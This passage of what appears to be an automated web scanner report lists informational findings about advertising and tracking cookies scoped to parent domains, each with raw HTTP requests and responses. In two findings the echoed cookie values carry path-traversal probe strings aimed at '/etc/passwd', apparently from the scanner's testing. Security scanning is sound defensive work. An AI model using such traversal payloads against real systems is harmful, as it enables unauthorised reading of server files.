Path:   /site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?QGoAAJMQIwBQUEQAAAAAADwgEgAAAAAAAgAQAAIAAAAAAP8AAAAGFEz4GAAAAAAATvgYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1DhMAAAAAAAIAAgAAAAAAmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB28HEx7NS8CmV5AsOiKv7-9qNiEv6o406fPd8cAAAAAA==,,http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%2F%3Fadid%3Dhero1,Z%3D300x250%26_salt%3D1957428050%26anmember%3D514%26anprice%3D%26r%3D1%26s%3D2298003,fc95296e-e0c7-11e0-b013-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.576669.791296.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 00:57:17 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 373
Date: Sat, 17 Sep 2011 00:57:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 00:57:17 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<img src="http://bannerfarm.ace.advertising.com/bannerfarm/279/CSG_TWW_MKT_20080513_01 _photo_300x250.jpg" border="0">');document.write('');
var can_adInfoTag = {};
can_adInfoTag["77
...[SNIP]...

11.115. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1076845.791296.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 00:57:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 567
Date: Sat, 17 Sep 2011 00:57:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 00:57:14 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write("<SCRIPT language='JavaScript1.1' SRC='http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.3;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000791296
...[SNIP]...

11.116. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBZMQIwBWUEQAAAAAAEAgEgAAAAAAAgAAAAYAAAAAAP8AAAAGFEz4GAAAAAAAUvgYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1DhMAAAAAAAIAAgAAAAAAmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMCYyQztO8ClmeR2rwo8Ab3j-oNvoGtMiyJOdrAAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F221%2Ftmz%2F728x90%2Fhomepage_btf%3Ft%3D1316238825238,Z%3D728x90%26_salt%3D2029454794%26anmember%3D514%26anprice%3D%26fo%3D%26hp%3D0%26ht%3Djs%26hu%3D%26m%3D0%26r%3D0%26refer%3D%26s%3D2298003%26tz%3D300%26url%3Dhttp%253A%252F%252Fwww.tmz.com%252F,5257a1a2-e0c7-11e0-91e5-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1076846.804034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 00:52:38 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 566
Date: Sat, 17 Sep 2011 00:52:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 00:52:38 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write("<SCRIPT language='JavaScript1.1' SRC='http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.2;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000804034/
...[SNIP]...

11.117. http://receive.inplay.tubemogul.com/StreamReceiver/services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /StreamReceiver/services

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /StreamReceiver/services HTTP/1.1
Host: receive.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
Content-Length: 1084
Origin: http://bostonherald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: text/xml; charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517; _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA; _tmpi=MjAxMTA5MTE_MTk6LTU2NzU2MzM0MjE2OTk4NTc1MTc6Mjh8MjotNTY3NTYzMzQyMTY5OTg1NzUxNzoyOHwzOkUxOjI3fDY6LTU2NzU2MzM0MjE2OTk4NTc1MTc6MzB8OTotNTY3NTYzMzQyMTY5OTg1NzUxNzozMHwxNDotNTY3NTYzMzQyMTY5OTg1NzUxNzoyNw

<?xml version="1.0" encoding="utf-8"?><StreamMiner xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.illumenix.com/StreamReceiver/services/schemas streamminer.xsd" v
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _tmpd="MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA../../../../../../../../etc/passwd%00MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA"; Version=1; Domain=.tubemogul.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: application/xml
Date: Sat, 17 Sep 2011 01:47:56 GMT
Connection: close
Content-Length: 1113

<?xml version="1.0" encoding="UTF-8" standalone="no"?><StreamMiner xmlns="http://www.illumenix.com/StreamReceiver/services/schemas" version="2"><Response><PlayerSetupResponse playerInstanceID="at0MMG7
...[SNIP]...

11.118. http://rs.gwallet.com/r1/pixel/x420r2425801  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x420r2425801

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x420r2425801 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 200 OK
Content-Length: 134
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Sun, 16-Sep-2012 01:11:49 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=37X1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sat, 17-Sep-2016 01:11:49 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ></body></html>

11.119. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=53&pbi=36&ord=5642669 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fcolumnists%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgsp=eV/lKTwBeV98GzwB; lgpr=yVfKV85Xz1cWYNFXeV+kWKVYx1c=; lgtix=NQAPAEABBgABADMBSQABADMBHAAoADUBDAABADMB/QADADYBXwABADMB

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:58:52 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=NQAQAEABBgABADMBSQABADMBHAAoADUBDAABADMB/QADADYBXwABADMB; path=/; expires=Tue, 16 Sep 2014 00:58:52 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 0
Connection: close


11.120. http://rt1302.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1302.infolinks.com
Path:   /action/doq.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316239041277.1 HTTP/1.1
Host: rt1302.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 9824
Origin: http://www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=3

makey=4b4e504c4d504f4c4d504f4e48514f4d4f484c4c4f4e494b49464d51697f7277&pimgs=justin%20timberlake%7Cnot%20my%20penis%21%7Cron%20artest%7Cname%20change%20official%7Csay%20hello%20to%20world%20peace%7Cmi
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:13:40 GMT; Path=/
Set-Cookie: cnoi=299; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:13:40 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1596
Date: Sat, 17 Sep 2011 00:59:32 GMT
Connection: close

data=({rid:'da106062-18d8-449e-805a-c1785d15d58b',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00',sentences:{'make a move':{auth:{ssd:'-HV1HL9kugjkzUE9AaVYLNETMWONXG_mTmiDxu3QYm1C5j8_7XGRE9qJFNJdkoe8me
...[SNIP]...

11.121. http://rt1701.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1701.infolinks.com
Path:   /action/doq.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316238789823.1 HTTP/1.1
Host: rt1701.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 6888
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=1

purl=http%3A%2F%2Fwww%2Etoofab%2Ecom%2Fnews%2F&makey=47425c40415c4340415c4342445d434143444040424a40464147405d69737677&ref=www%2Etoofab%2Ecom%2F2011%2F09%2F16%2Fexclusive%2Dmelissa%2Drivers%2Dsplits%2D
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:55 GMT; Path=/
Set-Cookie: cnoi=3; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:55 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1112
Date: Sat, 17 Sep 2011 00:51:48 GMT

data=({rid:'d1ea2b56-5fdd-49db-8dab-4fcf1e95e552',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'reproduction':{auth:{ssd:'Dh0IZuL4IgYIqeirAlxEjAfn7Youo56Z8NKXdeEB69xyms4gVwXeja3NOcEJpGwlHvwF
...[SNIP]...

11.122. http://rt1702.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1702.infolinks.com
Path:   /action/doq.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316239187592.1 HTTP/1.1
Host: rt1702.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 5152
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=5

by=f&jsv=222%2E0%2E4&plinks=news%7Cphotos%7Cvideos%7Cceleb%20couples%7Cceleb%20kids%7Ctv%7Cmovies%7Cmusic%7Cfashion%20%26%20beauty%7C2011%20emmys%7Csign%20up%7Csign%20in%7Cbritney%20spears%20wears%20r
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid="8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec"; Version=1; Domain=infolinks.com; Max-Age=2147483647; Expires=Thu, 05-Oct-2079 04:22:42 GMT; Path=/
Set-Cookie: cnoi=34; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:22:42 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1694
Date: Sat, 17 Sep 2011 01:08:35 GMT
Connection: close

data=({rid:'cca33222-1f55-4f3a-b220-79572031357e',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'partnership':{auth:{s
...[SNIP]...

11.123. http://rt1803.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1803.infolinks.com
Path:   /action/doq.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316238748131.1 HTTP/1.1
Host: rt1803.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 11273
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=0

makey=46435d41405d4241405d4243455c42404245414143444b40474b405c6971&phdrs=exclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Ccomments%7C43%7Cyour%20comment%7Creply%20to%20comment%7Coriginal%20c
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:11 GMT; Path=/
Set-Cookie: cnoi=2; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:11 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1583
Date: Sat, 17 Sep 2011 00:51:03 GMT
Connection: close

data=({rid:'456b3667-d6af-420e-b04b-3efe353e8d3b',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'college':{auth:{ssd:'INLkywXFzH-0oXMvJOgZ5OF1Q756Yvd4u-KMPg-00vMF6YWYlF_3yByMSC4EaFOf4g7b8X7wu
...[SNIP]...

11.124. http://rt1804.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1804.infolinks.com
Path:   /action/doq.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316239196124.1 HTTP/1.1
Host: rt1804.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
Content-Length: 5420
Cache-Control: max-age=0
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=6

pid=159065&wsid=1&ptxt=photos%7Cit%27s+official%7Cashlee+simpson%7Cvincent+piazza%7Chave+gone+public%7Cwhile+the+two+have+already+been+spotted%7Con+the+sidewalks+of+new+york%7Cashlee+stepped+out+on+th
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00daa02; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:23:14 GMT; Path=/
Set-Cookie: cnoi=80; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:23:14 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1723
Date: Sat, 17 Sep 2011 01:09:07 GMT
Connection: close

<script type="text/javascript">var data="({rid:'a7ad3562-1372-4dfd-befa-91c031751d48',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00daa02',sentences:{'official':{auth:{ssd:'NVQSiVxQEslfRVw0fiiMFfBU1U0B
...[SNIP]...

11.125. http://rt1901.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1901.infolinks.com
Path:   /action/doq.htm

Issue detail

